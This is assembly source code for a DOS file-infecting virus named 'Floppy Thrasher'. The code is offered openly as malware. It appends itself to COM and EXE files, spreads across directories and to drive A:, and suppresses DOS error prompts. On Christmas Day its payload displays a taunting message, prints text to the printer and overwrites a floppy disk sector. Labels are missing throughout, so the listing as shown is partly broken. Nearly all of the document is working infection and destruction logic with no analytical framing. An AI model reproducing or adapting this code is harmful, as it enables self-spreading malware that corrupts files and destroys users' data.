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2 Floppy Thrasher Virus Code
comment *
Floppy Thasher Virus
author Virus-X
infects COM and EXEs on Floppy and HDs
Its payload will display a message to screen, print out the printer
and over write the 1st sector of any floppy in drive A:\
with text
.model tiny
org 100h
db 0e9h,0,0,'D' ;1ST GEN Virus is a COM file
push ds
push cs cs
pop es ds ;save PSP
call delta
pop bp
sub bp,offset delta ;calculate delta offset
push [bp+offset counter] ;save counter to stack
cmp byte ptr [bp+counter],1 ;if counter is 1 EXE restore
jne exit_COM ;other wise restore 1st 3 bytes
lea si,[bp+EXE_IP] ;load SI with EXE_IP
lea di,[bp+Saved_ip] ;info at exe_ip will be at Saved_IP
mov cx,4 ;number times to move words
rep movsw ;go
jmp handlers ;set up our virus to search
lea si,[bp+tribyte] ;get orginal 4 bytes
mov di,100h ;they will be at file entry
mov cx,4 ;4 times
rep movsb ;movsb 4 times
call get_dir ;save curent dir
call int24 ;redirect int 24h
mov ah,19h ;get cur drive number
int 21h ;DOS
mov byte ptr [bp+Drive],al ;save drive number
cmp al,00h ;check if we are on DISK
jne DTAR ;if not set dta
mov ah,0eh ;otherwise change drive
mov dl,02h ;to c:\
int 21h ;DOS!
mov ah,3Bh ;change dir
lea dx,[bp+desktop] ;go todesktop (users often keep fav stuff on desktop)
int 21h ;DOS
lea dx,[bp+dta] ;load effective address of DX with new DTA
mov ah,1ah ;set new dta
int 21h
mov ah,4eh ;find first file
mov cx,7 ;with any attrib
lea dx,[bp+exefile] ;ending in *.EXE
int 21h ;DOS
jnc open ;if all Ok open
jmp COMsearch ;otherwise search for COM files
mov ah,4fh ;find next EXE file
int 21h ;DOS
jnc open ;if ok open the file
jmp COMsearch ;otherwise searchfor some damn COMs
mov ax,3d02h ;open read/write
lea dx,[bp+dta+1eh] ;file name in DTA
int 21h ;DOS!
xchg ax,bx ;file handle
call TimeSTAMP ;call routine used to save stamps
mov ah,3fh ;Read Bytes
mov cx,1ch ;read 1Ch bytes
lea dx,[bp+exeheader] ;store in offset EXEHEADER
int 21h ;DOS!
cmp word ptr [bp+exeheader+10h],'DK' ;is the file already infected?
je close ;if so close
cmp word ptr [bp+exeheader+18h],'@' ;is it a NE or PE file?
je close ;if so close
cmp word ptr [bp+exeheader+1ah],0 ;internal overlays?
jne close ;if yes close
call save_header ;save the exeheader
mov ax,4202h ;go to eof
xor cx,cx ;zero out cx
cwd ;zero dx
int 21h ;DOS
push ax dx ;save results
call calc_newset ;calculatenew offsets
pop dx ax ;restore file size
call calc_newsize ;calculate new size in pages
mov byte ptr [bp+counter],1 ;set counter as 1
mov ah,40h ;write to file
mov cx,endvirus-start ;virus length
lea dx,[bp+start] ;start at start
int 21h ;DOS!
mov ax,4200h ;go to file start
xor cx,cx ;zero out cx
cwd ;zero out DX
int 21h ;DOS
mov ah,40h ;write to file
mov cx,1CH ;number of bytes
lea dx,[bp+exeheader] ;write Virulent EXEHEADER
int 21h ;DOS
call set_stamp ;set time date stamp
mov ah,3eh ;close file
int 21h ;DOS!
jmp NextEXE ;find Next EXE file
mov ah,4eh ;find first file in Dir
mov cx,7 ;any attributes
lea dx,[bp+COMFILE] ;.COM
int 21h ;DOS
jnc openCOM ;if ok open COM file
jmp changedir ;if not change dir
mov ah,4fh ;Find another COM
int 21h ;DOS
jnc openCOM ;if ok open COM file
jmp changedir ;if not ok change dir
mov ax,3d02h ;open read/write
lea dx,[bp+dta+1eh] ;DTA File name location
int 21h ;DOS
xchg ax,bx ;bx = handle
call TimeSTAMP ;save time and date
cmp word ptr [bp+dta+1ah],24503 ;is the file
je closeCOM ;yeah close it
cmp word ptr [bp+dta+35],'DN' ;is the file
je closeCOM ;yeah close it
mov ax,4202h ;go to eof
xor cx,cx ;zero cx
cwd ;zero dx
int 21h ;DOS!
sub ax,3 ;subtract 3 from file size
mov word ptr [bp+newjump+1],ax ;put that value in newjump lower 2 bytes
mov ax,4200h ;go to file start
xor cx,cx ;zero cx
cwd ;zero dx
int 21h ;DOS
mov ah,3fh ;read bytes
lea dx,[bp+tribyte] ;into tribyte
mov cx,4 ;4 bytes
int 21h ;DOS
cmp byte ptr [bp+tribyte+3],'D' ;is it already infected?
je closeCOM ;if so close it
cmp word ptr [bp+tribyte],'MZ' ;is it a fricken misnamed EXE file?
je closeCOM ;ya close it
cmp word ptr [bp+tribyte],'ZM' ;misnamed exe?
je closeCOM ;yeah close it
mov ax,4200h ;go to file start
xor cx,cx ;zero cx
cwd ;zero dx
int 21h ;DOS
mov ah,40h ;write bytes
mov cx,4 ;4 bytes
lea dx,[bp+newjump] ;jump to virus code
int 21h ;DOS
mov ax,4202h ;move to end of file
xor cx,cx ;zero cx
cwd ;zero dx
int 21h ;DOS
mov byte ptr [bp+counter],0 ;zero counter
mov ah,40h ;write to file
mov cx,endvirus-start ;virus length
lea dx,[bp+start] ;where to start
int 21h ;DOS
call set_stamp ;set time stamp
mov ah,3eh ;close file
int 21h ;DOS
jmp nextCOM ;go find another COM file
lea dx,[bp+dot] ;'..'
mov ah,3Bh ;change directory
int 21h ;DOS!
jc DISKSWITCH ;if we root lets infect the floppy!
jmp search ;if all is well search
mov ah,19h ;get cur drive
int 21h ;DOS
cmp al,0 ;are we on a disk?
je check_load ;if so check the payload
mov ah,0eh ;otherwise change to Disk
mov dl,0 ;0=A:\
int 21h ;DOS
jmp search ;if all is ok search for EXEs
mov ah,2ah ;get system date
int 21h ;DOS
cmp dh,12 ;is it december?
jne exit_virus ;if not exit virus
cmp dl,25 ;is it christmas
jne exit_virus ;if not exit virus
mov ah,9h ;display message
lea dx,[bp+flopper] ;offset of message to display
int 21h ;DOS
mov ah,01h ;begin of printer payload
mov dx,0h ;put 0h in dx
int 17h ;int for initializing printer
lea si,[bp+str1] ;load str to si
mov cx,ender-str1 ;move string1len to cx
PrintStr: ;label fer printing our message
mov ah,00h ;write characters
lodsb ;load byte
int 17h ;printer int
loop PrintStr ;loop printstr till we are done
mov ah,03h ;write sector
mov al,1 ;number sectors
mov ch,1 ;cylinder number
mov cl,1 ;lower eight bits
mov dh,1 ;head number
mov dl,00h ;A:\
lea bx,[bp+sectbuff] ;data to write
push cs
pop es
int 13h ;int 13h call
mov ah,0eh ;change drive
mov dl,[bp+drive] ;back to saved drive
int 21h ;DOS
mov ah,3bh ;change dir
lea dx,[bp+Cur_Dir] ;to original directory
int 21h ;DOS!
call rset24 ;restore Int 24 Vector
pop [bp+offset counter] ;restore viral counter value
cmp byte ptr [bp+counter],1 ;is it a 1?
jne COMEXIT ;nope. were on a infected come file COm restore
pop ds ;restore DS
mov dx,80h ;80h =defualt DTA
mov ah,1ah ;set dta
int 21h ;DOS!
push ds ;push es
pop es ;pop es restore es = ds =PSP
mov ax,es ;es = ax
add ax,10h ;add ajustment for PSP
add word ptr cs:[Saved_CS+bp],ax ;Adjust old CS by cur sig
cli ;clear interrupt flags
add ax,word ptr cs:[bp+Saved_SS] ;Adjust old SS
mov ss,ax ;Restore stack to
mov sp,word ptr cs:[bp+Saved_SP] ;original position
sti ;restore int flags
db 0eah ;far jump to CS:IP
Saved_IP dw 0 ;storage for original IP
Saved_CS dw 0 ;storage for original CS
Saved_SP dw 0 ;storage for original SP
Saved_SS dw 0 ;storage for original SS
mov dx,80h ;80h = default DTA
mov ah,1ah ;set DTA
int 21h ;DOS
mov di,100h ;ax = 100h, file entry point
jmp di ;go to entry
mov ah,47h ;get current directory
cwd ;xor dx,dx
lea si,[bp+Cur_DIR] ;buffer
int 21h ;DOS!
ret ;return
mov ax,3524h ;get int vector 24
int 21h ;DOS!
mov word ptr [bp+old24],bx ;store bx in lower word
mov word ptr [bp+old24+2],es ;es in high word of offset old24
mov ax,2524h ;set int vector
lea dx,[bp+new24h] ;offset of new24h routine
int 21h ;DOS!
ret ;return
mov al,3 ;fail error
iret ;interrupt return
mov ax,5700h ;get time and date
int 21h ;dos
mov word ptr [bp+date1],cx ;save cx in offset date1
mov word ptr [bp+date2],dx ;save dx in offset date2
ret ;return
mov ax,word ptr [bp+exeheader+10h] ;get SP
mov word ptr [bp+exe_sp],ax ;save SP
mov ax,word ptr [bp+Exeheader+16h] ;get CS
mov word ptr [bp+exe_cs],ax ;save CS
mov ax,word ptr [bp+exeheader+14h] ;get IP
mov word ptr [bp+exe_ip],ax ;save IP
mov ax,word ptr [bp+exeheader+0eh] ;get SS
mov word ptr [bp+exe_ss],ax ;save SS
ret ;return
mov cx,10h
div cx
sub ax,word ptr [bp+exeheader+8h] ;filesizez - headersize=we want
mov word ptr [bp+exeheader+14h],dx ;NEW IP
mov word ptr [bp+exeheader+16h],ax ;NEW CS
mov word ptr [bp+exeheader+0eh],ax ;NEW SS
mov word ptr [bp+exeheader+10h],'DK' ;NEW SP
ret ;return
add ax,endvirus-start ;add virus size to f-size
adc dx,0 ;add carry
mov cx,200h ;200h = 512 hex
div cx ;divide file into pages
cmp dx,0 ;check if dx is equal 0
je continue ;if so continue
inc ax ;incremnet AX
mov word ptr [bp+exeheader+4h],ax ;set new partpag
mov word ptr [bp+exeheader+2h],dx ;set new PageCnt
ret ;return
mov ax,5701h ;set time and date stamp
lea cx,[bp+date1] ;set cx for old value
lea dx,[bp+date2] ;set dx for old value
int 21h ;DOS
ret ;return
mov ax,2524h ;set IVT 24h
lea dx,[bp+old24] ;point to old 24h
int 21h ;DOS
ret ;return
date1 dw ?
date2 dw ?
desktop db 'C:\windows\desktop',0
Cur_DIR db 64 dup (0) ;storage for Dir info
dot db '..',0
old24 dd ?
exefile db '*.exe',0
comfile db '*.com',0
newjump db 0e9h,0,0,'D'
tribyte db 0cdh,20h,0,0
exeheader db 1ch dup (?)
DTA db 42 dup (?)
counter db 0
drive db 0
sectbuff db 'This floppy thrashed by Floppy Thrasher Virus',0
flopper db 'Floppy Thrasher (c) 1998',10,13
db 'Floppy in drive A:\ being thrashed......',10,13
db 'thank you for being infected have a nice day ',10,13,'$'
exe_ip dw 0 ;storage for IP
exe_cs dw 0fff0h ;storage for CS
exe_sp dw 0 ;storage for SP
exe_ss dw 0fff0h ;storage for SS
str1 db 'Floppy Thrasher......Infecting COM and EXE files for along time......',0ah,0dh
db 'have you been a good user this year? i think not......thus the floppy in drive A must DIE',0ah,0dh
db 'Your computer is infected with floppy thrasher muhahahahahah',0ah,0dh
db 'remmeber my name for i am the floppy thrasher Virus',0Ch
ender label near
endvirus label near
end start1